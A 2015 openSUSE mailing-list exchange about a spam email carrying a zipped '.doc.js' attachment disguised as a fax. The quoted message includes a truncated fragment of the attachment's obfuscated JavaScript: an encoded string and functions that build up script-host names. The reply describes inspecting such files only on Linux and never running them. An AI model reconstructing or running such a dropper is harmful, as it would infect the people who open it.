On 11/09/2015 07:57 AM, Carlos E. R. wrote:
Hi,
I just got a malware email (5 KB). It claims to be a FAX document, but of course it is not. It is zipped, thus not every tool would see it. When expanded, it contains a file with .doc.js extension.
It is a single line of probably javascript code.
var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C50 5556555E55";function y5(){return 'xa.clo';};function c8(){return 'jet.c';};function n9(){return ' = WS';};function r8(){retur
Would this "work" on Linux? Somebody is interested in having a look at it?
I get a dozen of these a day in my spam trap. Its always in a zip or a pdf, or a fax of something miss-labeled. I seldom ever look at these at all, but they score low enough in spamassassin to get into the spam bin as opposed to being summarily junked by Amavisd. Anyway, I never touch them on a windows machine, do all my inspections on linux, and have never had one of these do anything, but then the only thing I do is LOOK at the contents of the zip. I can't imagine trying to execute one of these things, even as an experiment, even in a virtual machine. I can't imagine yours is special in any way, these things are everywhere, and anyone interested in researching these to see if they might work in linux has a boat load of them to work with. -- After all is said and done, more is said than done. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org